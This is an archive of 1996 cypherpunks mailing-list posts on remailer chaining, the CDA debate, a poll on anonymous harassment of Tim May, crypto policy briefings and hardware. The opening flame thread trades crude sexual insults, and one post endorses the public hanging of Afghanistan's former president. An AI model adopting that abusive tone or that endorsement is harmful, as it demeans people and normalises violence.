>> >> >In-Reply-To: <FFi2uD82w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 07:14:50 pm
>> >> >X-Mailer: ELM [version 2.4 PL23]
>> >> >Mime-Version: 1.0
>> >> >Content-Type: text/plain; charset=US-ASCII
>> >> >Content-Transfer-Encoding: 7bit
>> >> >Content-Length: 3442
>> >> >
>> >> >>
>> >> >> What has Timmy been smoking?
>> >> >>
>> >> >> ]From paul@fatmans.demon.co.uk  Sun Sep 29 19:03:40 1996
>> >> >> ]Received: by bwalk.dm.com (1.65/waf)
>> >> >> ]	via UUCP; Sun, 29 Sep 96 19:14:06 EDT
>> >> >> ]	for dlv
>> >> >> ]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
>> >> >> ]        id AA25790 for dlv@bwalk.dm.com; Sun, 29 Sep 96 19:03:40 -0400
>> >> >> ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net  id ac16129;
>> >> >> ]          29 Sep 96 15:59 BST
>> >> >> ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net
>> >> >> ]           id aa09441; 29 Sep 96 15:54 BST
>> >> >> ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP
>> >> >> ]	id AA843903697 ; Sat, 28 Sep 96 09:41:37 +0000
>> >> >> ]Comments: Authenticated sender is <paul@fatmans.demon.co.uk>
>> >> >> ]From: paul@fatmans.demon.co.uk
>> >> >> ]To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
>> >> >> ]Date: Sat, 28 Sep 1996 09:21:37 +0000
>> >> >> ]Mime-Version: 1.0
>> >> >> ]Content-Type: text/plain; charset=US-ASCII
>> >> >> ]Content-Transfer-Encoding: 7BIT
>> >> >> ]Subject: Re: Possible subs attack????
>> >> >> ]Priority: normal
>> >> >> ]X-Pm-Encryptor: JN-PGP-P, 4
>> >> >> ]X-Mailer: Pegasus Mail for Windows (v2.31)
>> >> >> ]Message-Id: <844008901.9441.0@fatmans.demon.co.uk>
>> >> >> ]
>> >> >> ]-----BEGIN PGP SIGNED MESSAGE-----
>> >> >> ]
>> >> >> ]
>> >> >> ]> The lying sack of shit Timmy May <paul@fatmans.demon.co.uk> writes:
>> >> >> ]
>> >> >> ]> The lying sack of shit Timmy May lies again, as usual.
>> >> >> ]
>> >> >> ]Fuck you,
>> >> >> ]
>> >> >> ]I am not Tim May, Check out the return path if you don`t believe me,
>> >> >> ]if you still don`t here`s my PGP public key signed by the EFF, they
>> >> >> ]don`t sign keys here and there without checking ID`s...
>> >> >> ]
>> >> >> ]Type Bits/KeyID    Date       User ID
>> >> >> ]pub  1024/5BBFAEB1 1996/07/30 Paul Bradley <paul@fatmans.demon.co.uk>
>> >> >> ]
>> >> >> ]- -----BEGIN PGP PUBLIC KEY BLOCK-----
>> >> >> ]Version: 2.6.3ia
>> >> >> ]
>> >> >> ]mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
>> >> >> ]6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
>> >> >> ]sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
>> >> >> ]tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
>> >> >> ]NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
>> >> >> ]Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
>> >> >> ]j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
>> >> >> ]C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
>> >> >> ]9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
>> >> >> ]En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
>> >> >> ]YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
>> >> >> ]put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
>> >> >> ]LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
>> >> >> ]mUqFH41Z7NkyO8ZFdi5GGX0=
>> >> >> ]=CMZA
>> >> >> ]- -----END PGP PUBLIC KEY BLOCK-----
>> >> >> ]
>> >> >> ]
>> >> >> ]
>> >> >> ]-----BEGIN PGP SIGNATURE-----
>> >> >> ]Version: 2.6.3ia
>> >> >> ]Charset: cp850
>> >> >> ]
>> >> >> ]iQCVAwUBMkzuH75OPIRbv66xAQHSmQQAqw0F/lIsCcQwOpiSQDx4hMqOVVUVXbyR
>> >> >> ]3RMWY20ECE0TpAtJ6hkAiqphsWUSBqiFj2kGHMh+jHSHXIMPF+m1qtwVbgutJC7B
>> >> >> ]8VYWj0VP+bGu5dEUisLrVHDNj5ucEIDyK2GnqObiCiKARFUbOuZnMQOp9TDJqibh
>> >> >> ]2Wqa5+h8R7g=
>> >> >> ]=/M2U
>> >> >> ]-----END PGP SIGNATURE-----
>> >> >> ]
>> >> >> ]  Datacomms Technologies web authoring and data security
>> >> >> ]       Paul Bradley, Paul@fatmans.demon.co.uk
>> >> >> ]  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org
>> >> >> ]       Http://www.cryptography.home.ml.org/
>> >> >> ]      Email for PGP public key, ID: 5BBFAEB1
>> >> >> ]     "Don`t forget to mount a scratch monkey"
>> >> >>
>> >> >Fuckhead.
>> >>
>> >Fuckhead.  We know your behind Vulis, Cock-sucker
>>
>and he swallows




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 30 Sep 1996 23:34:44 +0800
To: cypherpunks@toad.com
Subject: An ITAR moment
Message-ID: <Pine.SUN.3.91.960930081123.12078A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


I'm currently sitting in a computer lab at the ICM in Warsaw, at a 
workshop on caching in the web. I wanted to log back home to check my 
email, so I asked if they had telnet or something. "Actually, we're 
disabling rlogin and telnet on our machines - can you use ssh?".

Simon

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 1 Oct 1996 05:22:38 +0800
To: cypherpunks@toad.com
Subject: Bruce Taylor vs. John Perry Barlow, in HotWired's Brain Tennis
Message-ID: <Pine.GSO.3.95.960930081833.3684G-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Mon, 30 Sep 1996 08:17:22 -0700 (PDT)
From: Declan McCullagh <declan@well.com>
To: fight-censorship@vorlon.mit.edu
Subject: Bruce Taylor vs. John Perry Barlow, in HotWired's Brain Tennis

Taylor and Barlow have been battling it out in a HotWired Brain Tennis
match for the last week. Check out some excerpts lobbed across the, um,
neural nets...

-Declan

**********

   Linkname: Wired Online: Brain Tennis            
        URL: http://www.hotwired.com/braintennis/
	
---
	
   Bruce Taylor, president of the National Law Center for Children and
   Families and a leading advocate of the Communications Decency Act, was
   also formerly a US Department of Justice and city of Cleveland       
   prosecutor.
   
   John Perry Barlow is an Electronic Frontiers Foundation co-founder,
   member of The Well's board of directors, author, retired Wyoming  
   cattle rancher, and lyricist for the Grateful Dead. 

---

   Friday, 27 September 1996
   Post No. 5 of 8
   by Bruce Taylor
   
   I got you now, John Perry. You say "First Amendment!" However, not all
   detrimental speech is protected - treason, false advertising,
   defamation, obscenity, child porn, and incitement to violence.
   Indecent speech that's not obscene is protected among adults, but
   there's no constitutional right to provide it to minors. If you call
   up the rule of law ("This is a Nation of laws, not of men"), you are
   bound by its limits.
   
   The Supreme Court recognizes limits for indecent mass communications.
   The Court didn't say "less" restrictive (as the ACLU does - no law,
   less law, parent's problem), but asked whether the method chosen by
   Congress is the "least" restrictive means that is still effective in
   achieving its purpose. Big difference.
   
   State display laws don't say parents keep kids from stores, it says
   stores put porn out of reach. Dial-a-porn laws don't deny phones to   
   kids or say warnings are enough, but require credit cards or PINs for
   adults to access sex messages. Responsible adults should take good
   faith steps that are effective for all but "the most enterprising and
   disobedient young people." Can adults obtain adult speech while
   shielding it from most kids? That is all the law and Supreme Court
   ask.               

   Why ask adult society to help protect our children? Why not just leave
   it up to each parent? Why not rejoice in the public profanities your
   children hear on the subway? Because children have rights to a "decent
   society." Your child may hear cursing on subways, but New York's   
   display law keeps Hustler centerfolds off walls and news racks. So
   you, too, benefit from what other adults must do in deference to your
   children. The Internet should not remain an "adult" bookstore for kids
   any more than Times Squares' should be open to kids.
   
   I also got you on philosophy, dear John. Our "'60s humanitarianism"
   was for social commitment, working together, selfless love for all the
   peoples of the world. Remember? Your refusal to hide your precious
   porn from the public Web seems like callous indifference to what kids
   will endure. To me, your position is appositive to true "liberalism."
   You sound like an elitist technohippie who can take care of his own,
   but doesn't care what kids would see, seek, suffer, or be seduced by.
   You're probably richer than I, maybe even smarter, but your protest  
   has a bit of a whine. The CDA only asks Internet users to shield kids
   so kids can use it, too, and asks industry to give us the means of   
   doing online what we do everywhere else. Use your brain and heart to
   help find the ways, to pressure the techno-industrial complex, to help
   make the Internet safe for kids. Try it, you'll like it.

************
   
   On Friday, Bruce Taylor said "children have rights to a 'decent
   society.'" Today, Barlow replies "You will not be happy until you have
   imposed your moral code on the rest of humanity." Can we expect the 
   world to share the same concept of "decency"? Discuss in Threads....

   Monday, 30 September 1996
   Post No. 6 of 8
   by John Perry Barlow

   Bruce, remember what I said in my first post about shadowboxing? We're
   there, pal. You and I are not talking about the same "place." You're
   talking about physical, walking-around reality within a quaint conceit
   called the United States of America, and I'm talking the seamless and
   global continuity that is cyberspace.    
     
   Now I will confess I misdirected the flow myself by referring to the
   First Amendment. I never should have done that, but I was strangely
   drawn into your reality-distortion field by all that talk about what
   "no one has the right to say." Utterly knee-jerk of me. I apologize.
   
   But here's the terrible truth of it: These obscenity statutes you
   cite, along with the First Amendment itself, are all local ordinances.
   Even the treaty to which you apparently refer offers spotty coverage
   as it has only six official signatories, as far as I can tell. There
   is not a single government on this Earth that has the right to
   regulate the rest of it. For better or worse.
                      
   There are days when I wish there were. Certainly I would be delighted
   if I thought the protections in the Bill of Rights could be afforded
   to all God's children, just as you would no doubt be delighted if the
   sexual-conduct laws of Saudi Arabia could be applied to all
   "enterprising and disobedient young people," wherever their dirty 
   minds be housed. But they can't. And unless the United Nations becomes
   a lot more effective, there will never be a world government
   sufficient to convey such rights or restrictions.
   
   So, should either of us wish to restrict or maintain liberty on the
   Internet, we can't turn to government to assist us. We are stuck with
   governance, which is to say, the order that arises from social
   etiquette, cultural ethics, practicality, and technological        
   architecture.
   
   There is, in fact, plenty of comfort both of us can take from these.
   Since I am, as you charge, a technohippie, I'm convinced that as long
   as the Internet remains a packet-switched network, it will be very
   difficult to control the content of the whole.
   
   On the other hand, as long as there are folks like yourself who wish
   to construct sanitized zones within it, that same technical
   characteristic makes it fairly easy to filter out most of the tainted
   packets and to observe very carefully, as they do at both my
   daughter's high school and in Singapore, who is attempting to get
   what.
   
   We are looking at opportunities for global liberty and local        
   authoritarianism, and that should make us both happy. But you and the
   rest of your kind in the US Congress wish to think locally and act
   globally. You will not be happy until you have imposed your moral code
   on the rest of humanity. And I can imagine few aspirations more
   elitist than that, Bruce.

###









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 1 Oct 1996 05:53:57 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: POLL RESULTS
Message-ID: <Pine.SUN.3.91.960930075945.10636B-100000@crl9.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Last week I offered an informal poll as to the reputational 
effect of "John Anonymous MacDonald" and other apparent nyms.

I received responses from 31 of you.  All were signed by known
Cypherpunks; none were anonymous.  I was not surprised to find 
absolutely zero respect for "Anonymous."  In addition, there were
no negative comments about Tim and in most cases, high marks for
his restraint and dignity under the circumstances.  Perhaps not
so surprisingly, a significant number of you expressed the belief 
that the "Anonymous" posts come from Demetri Vulis.  Following, 
are a few samples of what respondents had to say.  (They are
reproduced without atribution because I had not asked permission
to do so in my origninal poll request.)


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Clearly, John Anonymous MacDonald is losing points. Tim's reputation
is unaffected.

... 

I'd be suprised if anyone regarded Anonymous with any degree of respect 
anymore.  As for Tim May, he already had a good rep in my book to start 
with, and by not responding in a similar matter (at least not publicly)  
to these people, his reputation is enhanced even more.

...

Who is John Anonymous MacDonald...We can only surmise that his 
real joy is playing with himself in public.

...

Anonymous is a total moron who'd be annoying me greatly
if I hadn't managed a decent killfile.

...

The posts are idiotic and childish, and reflect quite badly on the
sender (presumably Dmitri Vulis KOTM).  If anything, they provide a
reason to pay *more* attention to tcmay.

...

As with any public display of poor taste, anonymous shows themselves lackjing in
judgement. I credit Tim for not responding.

...

I personally think that these anonymous attacks are pointless.  They are
just stupid insults, and they don't do anything negative to Tim's
reputation except show that someone likes abusing remailers.  Perhaps
Tim's reputation may get enhanced by the fact that someone has to go this
low to debase him.

...

It seems to me that anyone who is unwilling to allow the abused party to 
respond personally is undeserving of anyone's respect. To feel the need 
to do it in a public forum with however many thousands of people are on 
these lists is a sign of insecurity and weakness...

...

Tarnished - John Anonymous MacDonald
Enhanced - Tim May (due to his restraint!)

...

Tim's reputation is definately being enhanced, if it's fair to judge a 
man by the ememies he keeps.  ;)

...

...Since these annoying posts started a week or so ago, I have
(for the first time ever) begun killfiling people and messages
on the cp list.  Right now I am killing all messages from 
John Anonymous MacDonald, Dmitri Vulis, and any message
in the "daily ... regarding TCM" thread(s).  I hope this madness
can end, so we can get back to more normal traffic levels on the
list.

...

Dimitri 'Anonymous' Vulis' reputation has gone
way out on the negative side.

(He's been an obvious nutcase from the start...)
TC May's positive reputation has increased from
his handling of these attacks.

...

This kind of post shows Anonymous to be at the social level of a grade
school child.  If s/he grows up, I may change my mind.

It does nothing to effect my opinion of Tim May...

Anonymous is making a public mockery of him/herself.

...

The anono-twits lose by a mile....

...It's not much different from graffiti - some people put up
interesting posters on walls and telephone poles, and
write interesting stuff on bathroom walls; others scrawl
empty vulgarity...

...

Anonymous's reputation went instantly from 0 to negative infinity.

Tim May's reputation is unaffected.

...

It certainly does nothing to harm Tim's reputation, from where I
stand.  Thank God for procmail!

...

Well, as Tim has managed to sit back and take it, and I've killfiled the 
main perpetrators.  I'd say it makes a public mockery of Anonymous.

...

...it seems evident that some non-anonymous posters aka KTOM seem to 
understand how to *abuse*  our American freedom's but don't understand about
*responsible*  use.

Is this a deliberate attempt to damage this list or is it that some folk
just can't handle freedom?

...

...I killfile Foolish Voolish and most of the others, just
because of these ridiculous ad hominem attacks on Tim.

...

Anonymous' claims make him look stupid simply because they have no technical or
political message - just dirty words...Tim May's reputation is enhanced, I think, by the fact that *other people* come
in and dispute Anonymous' claims, over and over again.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 1 Oct 1996 05:48:49 +0800
To: cypherpunks@toad.com
Subject: Re: active practice in America
In-Reply-To: <199609290438.WAA23813@infowest.com>
Message-ID: <v03007801ae75a6f4b4f6@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:32 PM -0700 9/29/96, Dale Thorn wrote:

>Speaking of peers, what would the founding fathers have said about the
>trial of the officers in the Rodney King case?  Would they, as police
>officers, have a right to a jury of their peers?  Would their peers be
>the people in Simi Valley, where many or most of them live?  Or would it
>be more appropriate to have a jury of the victims' peers?  Or both?

More importantly, what's happened to "double jeapardy"? The four cops were
found "Not Guilty" in their criminal trial (or at least three of them
were...I forget the details--one may have been a mistrial).

So, as some people then proceeded to burn down their neighborhoods, loot,
and run amok in the streets for several days, a _second_ trial was held.
This time the verdicts were more in line with what the street wanted, plus,
all the good electronics stores had already been looted or had moved out of
South Central, so no riots.

(Legal purists will point out that the second trial was for "Federal civil
rights violations." Harummphh. What would the Founders think of this logic:
"First we try them on ordinary criminal charges. If they are found Not
Guilty, we charge them in the next higher court with more abstract charges.
If they are still found found Not Guilty, we hit them with "civil rights"
and "being disrespectful to women" charges. And if that doesn't work, we
charge them in the World Court. We've only had one guilty party get past
them, and for that guy we appealed to the Pope and he put a Papal Hex on
the guy and ordered him burned in oil.")

Double jeapardy means the system gets one shot at proving charges, not two
or three.

(And, yes, even though I am sure O.J. Simpson killed those two people, I am
not happy with what appears to be a _second_ trial. For sure, it's a
_civil_ trial, for damages, but to this layman it looks like a second trial
on the main charges. I suppose I always thought that being found "Not
Guilty" on the act itself made it essentially impossible for a civil trial
to redecide the same issue. Boy, was I wrong.)

--Tim May



We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Tue, 1 Oct 1996 01:48:59 +0800
To: John Anonymous MacDonald <nobody@cypherpunks.ca>
Subject: Re: Does any body know anything about this?
In-Reply-To: <199609292138.OAA27616@abraham.cs.berkeley.edu>
Message-ID: <Pine.BSF.3.91.960930084855.15409B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 29 Sep 1996, John Anonymous MacDonald wrote:

> Is this just more snakeoil or is this real?

No, it is Matt Blaze. Go and read every altavista search hit on his name 
as your pennance for posting this.   ;)

-r.w.

>                   University of Cambridge Computer Laboratory
> 
>                                 EXTRA SEMINAR
> 
> SPEAKER:        Matt Blaze
>                 AT&T Research
> 
> DATE:           Monday 23rd September 1996 at 11.30 am
> 
> PLACE:          Room TP4, Computer Laboratory
> 
> TITLE:          SYMMETRIC-KEY CIPHERS BASED ON HARD PROBLEMS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Geoffrey C. Grabow" <gcg@pb.net>
Date: Tue, 1 Oct 1996 01:24:05 +0800
To: cypherpunks@toad.com
Subject: Re: What about making re-mailers automatically chain?
Message-ID: <3.0b15.32.19960930085114.0068dec0@mail.pb.net>
MIME-Version: 1.0
Content-Type: text/enriched

At 09:30 09/29/96 -0800, you wrote:
>At 4:14 AM -0500 9/29/96, David E. Smith wrote:
>
>>I dunno about that one.  Even if the message itself is encrypted,
>>every remailer has to have the address of the final recipient for
>>your plan to work.  And if you have cleartext for that message
>...
>
>Actually, as I read the original proposal, it was to only _insert_
>additional links. Thus, imagine the following remailer chain, with Alice
>sending to Zeke  through a chain, represented in parentheses (like LISP):
>
That's what I was going for.  The re-mailer would only add links if the recip that it sees is another mailer.  If it doesn't recognize the destination as a remailer, it must assume that it's the last link and should send the mail.  If that doesn't happen Dave's right.  Multiple mailers would know the final dest.  The question I was heading for on this is: 

Does this add anything useful?  

Removing knowledge of the path from the sender is a plus.  This prevents anyone, even the sender, from being able to give up any useful info even if under court order.  Adding "random" traffic is helpful 'cause many people (including myself) use pre-fab anon scripts and therefore use the same anon paths all the time (I should stop that).  This opens those messages up to some analysis and the possibility of the sender being revealed.

Granted, these are not major items.  The real question is:

Is this worth implementing?  As gbroiles@netbox.com said:

>All of this (adding remailer status tracking based on frequent updates of
>digitally signed information from a trusted third party) can be done, but
>it's a pain in the ass to code...




G.C.G.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Geoffrey C. Grabow       |      Great people talk about ideas.       |
| Oyster Bay, New York     |     Average people talk about things.     |
| gcg@pb.net               |      Small people talk about people.      |
|----------------------------------------------------------------------|
|     PGP 2.6.2 public key available at http://www.pb.net/~wizard      |
|          and on a plethora of key servers around the world.          |
|                          Key ID = 0E818EC1                           |
|   Fingerprint =  A6 7B 67 D7 E9 96 37 7D  E7 16 BD 5E F4 5A B2 E4    |
|----------------------------------------------------------------------|
| That which does not kill us, makes us stranger.   - Trevor Goodchild |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 1 Oct 1996 05:31:12 +0800
To: cypherpunks@toad.com
Subject: Katz on cypherpunks, in HotWired's Media Rant
Message-ID: <Pine.GSO.3.95.960930090407.3684I-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain


[Background: the cypherpunk/pw:cypherpunk account used for HotWired's
Threads discussion section has been used for anonymous flaming and
attacks. --Declan]

   Linkname: The Netizen - Media Rant - Jon Katz
        URL: http://www.netizen.com/netizen/96/40/katz0a.html            
                          
HotWired
The Netizen
30 Sep 96

[...]

      In addition, the digital culture has long been demonized by the
            outside world and is inherently defensive and edgy.
   
     Cypherpunks give us fascinating insights into this subject, since
     their equivalent exists in no other medium, and they epitomize the
    often mindless verbal violence that characterizes some parts of the
   Net. Their original purpose - techno-anarchy and advocating unfettered
   access to information - conflict head-on with the Web's mainstreaming
              and the arrival of the newly wired middle class.
                                          
     Cypherpunks don't want real confrontations or discussions, or they
   would reveal their identities and make it possible to respond, as most
    flamers do. They are among media's rarest and at the same time most
                  easily recognized subspecies: nihilists.
   
   Anonymous communication makes verbal violence easy. Since most flamers
   don't know their targets and won't ever meet them, it's easy enough to
     attack individuals and question personal motives, with none of the
            social consequences of face-to-face verbal assaults.

         And Net communication also offers no filter: because it's
   instantaneous, people often don't take the time to cool off, reflect,
          or take another look at the messages they mail and post.
     
   When tempers flare here, it doesn't even take the time of a phone call
    to pop off. So, hostile messages are often impulsive and frequently
          regretted, apologized for, or taken back and clarified.
   
      Since the Net makes communication so easy, it makes corrections,
    criticism, and discussion inevitable. Nobody who writes or posts on
     the Web should expect anything less than sustained and continuous
       challenge and critique, something that is rarely permitted in
    mainstream journalism. Web writers and posters have to see these as
   integral to their work - not simply attacks - and as healthy antidotes
                to conventional media arrogance and elitism.
                                             
      Accompanying the hundreds and hundreds of personally assaultive
   messages I've gotten - as opposed to the thousands of simply critical
     ones - there is a strange and recurring phenomenon: If you respond
       quickly and respectfully, the overwhelming majority of hostile
   emailers either apologize, change their tone, or write back in a more
      reflective, serious, or friendly way. Most of these posters are
   stunned that anyone read their mail in the first place, or, even more
                        amazingly, responded to it.
                                         
[...]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Tue, 1 Oct 1996 00:58:04 +0800
To: cypherpunks@toad.com
Subject: Re: The Petaflops Boondoggle Computer (was PET_ard)
Message-ID: <199609301325.GAA13466@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> On Sun, 29 Sep 1996 12:16:27 -0800, Timothy C. May wrote:
> 
> >Symmetric multiprocessing is available, but it's often much less hassle to
> >have a single CPU running at 200 MHz than to try games with multiple
> >processors (which means more PCB real estate, more sockets, more of other
> >things).
> 
> As far as SMP goes, it's actually not all that expensive.  People in the
> linux-smp list have reported differences of as little as $50 for a
> uniprocessor vs. dual pentium system.   Of course, every so often we'll get a
> message about a $30,000 system that can handle up to <drool>64 Pentium
> Pros</drool>! 

Check out http://www.ssd.intel.com/tflop.html, where Intel is building
a 9000 Pentium Pro (200 MHz) machine for Sandia. Yes, it runs Unix,
and they've already delivered the first 64 processor node.

When finished, it will have 600Gbyte RAM, 200Tbyte disk, and run at
about 1.8 Tflops, and cover about 1600 square feet.

Price? 46 M$, or about $5k/processor.


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wayne H. Allen" <whallen@capitalnet.com>
Date: Tue, 1 Oct 1996 02:18:23 +0800
To: cypherpunks@toad.com
Subject: Re: [AP] Afghanistan
Message-ID: <199609301406.KAA08044@ginger.capitalnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:57 PM 9/29/96 EDT, Dr.Dimitri Vulis KOTM wrote:
>"Wayne H. Allen" <whallen@capitalnet.com> writes:
>
>> At 04:10 AM 9/29/96 EDT, Dr.Dimitri Vulis KOTM wrote:
>> >Afghanis publicly hanged their former president, Najibullah [no last name].
>> >Other countries should follow their example.
>> >
>>
>>     And this would accomplish???? And this has what to do with cryptography??
>
>Nothing, of course - neither do Timmy May's stupid rants, lies, and personal
>attacks.
>
>By the way, your abuse of your native language suggests that you're probably
>a product of U.S. public education.
>
>

    And you would be far off base once again.
Wayne H.Allen
whallen@capitalnet.com
Pgp key at www.capitalnet.com/~whallen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "CRYPTO" <crypto@nas.edu>
Date: Tue, 1 Oct 1996 02:37:24 +0800
To: crypto@nas.edu
Subject: Another briefing in Atlanta on the NRC crypto report,...
Message-ID: <9608308441.AA844103952@nas.edu>
MIME-Version: 1.0
Content-Type: text/plain


Subject:
Another briefing in Atlanta on the NRC crypto report, October 21, 1996

  Cryptography's Role in Securing
  the Information Society
  
  
  A Public Briefing in Atlanta, Georgia
  Monday, October 21, 1996, 1:30-3:30 pm
  
There will be a public briefing in Atlanta, Georgia by the National
Research Council on this report.  The briefing will be held at the
Manufacturing Research Center on the campus of the Georgia Institute of
Technology on Monday October 21, from 1:30 to 3:30.   Dr. Herbert Lin,
director of the NRC study will conduct the briefing.  Questions from the
audience will be entertained. For further information, please contact Dr.
Myron L. Cramer (404) 894-7292, <myron.cramer@gtri.gatech.edu> at the
Georgia Tech Research Institute.

The event is open to the press and the public.

Directions: From I-75/85 exit on Tenth Street and head West.  Turn left on
Hemphill Street and follow it to where it ends on Ferst Street.  The
Manufacturing Research Center is the modern building in front of you.
Parking is limited; use public transportation or allow yourself extra time.

     If you have suggestions about other places that the committee should
     offer a public briefing, please send e-mail to crypto@nas.edu.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 1 Oct 1996 03:14:06 +0800
To: cypherpunks@toad.com
Subject: the theory of split currency
Message-ID: <v0300780fae75885ba0ff@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


Austrian-econ is an academic economists' list focused on so-called
"austrian" economics, like Hayek, Von  Mises, etc...

Notice the last little bit about Patrick Leahy...

Cheers,
Bob Hettinga

--- begin forwarded text


Date: 	Sat, 28 Sep 1996 20:13:48 -0700 (PDT)
From: Fred Foldvary <ffoldvar@jfku.jfku.edu>
To: Austrian Economics <AustrianEcon@agoric.com>
Subject: the theory of split currency
Organization: JFK University
Mime-Version: 1.0
Sender: owner-austrianecon@agoric.com
Precedence: bulk
Reply-To: AustrianECON@agoric.com

Is there a name for a dual or split currency, in which
there is one currency for domestic use and another, different
appearing, currency for foreign usage?

Does anyone know of any country which has had such a
split currency?

Is there any literature on such split currency?

Here some thoughts on how it could function in the U.S.:
1) Domestic currency would not be legal tender outside the U.S.
2) Foreign US dollars would not be legal tender in the U.S.
   It would be illegal to hold foreign dollars in the U.S.
   Travelers would be required to convert them at customs.
3) The export of domestic currency would be illegal.
4) All exchanges between domestic and foreign currency would
be required to be made in official exchanges, with the amounts
recorded and reported to the government.
5) All previous currency would be declared of no value after
a certain date.  All conversions to new currency would be
reported.

What would be the implications for banking, international
trade, and the market process?  Would it affect the measurement
of the money supply, and monetary policy?

A motive for the government would be to control the underground
economy, tax evasion, and the trade in illegal substances.

This scenario is not entirely hypothetical.  I have read that
Senator Patrick Leahy introduced Senate Bill #307 to create
such a split currency.  The Bill failed to pass the Senate,
but this shows the concept is out there.

Is this worth investigation and theoretical examination?

Fred Foldvary

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 1 Oct 1996 11:44:42 +0800
To: cypherpunks@toad.com
Subject: Mailmasher
Message-ID: <v03007812ae75892bd1d9@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



Hey guys,

Take a look at:

http://www.mailmasher.com/

It's a way to get your mail through a web page. Pretty useful when you're
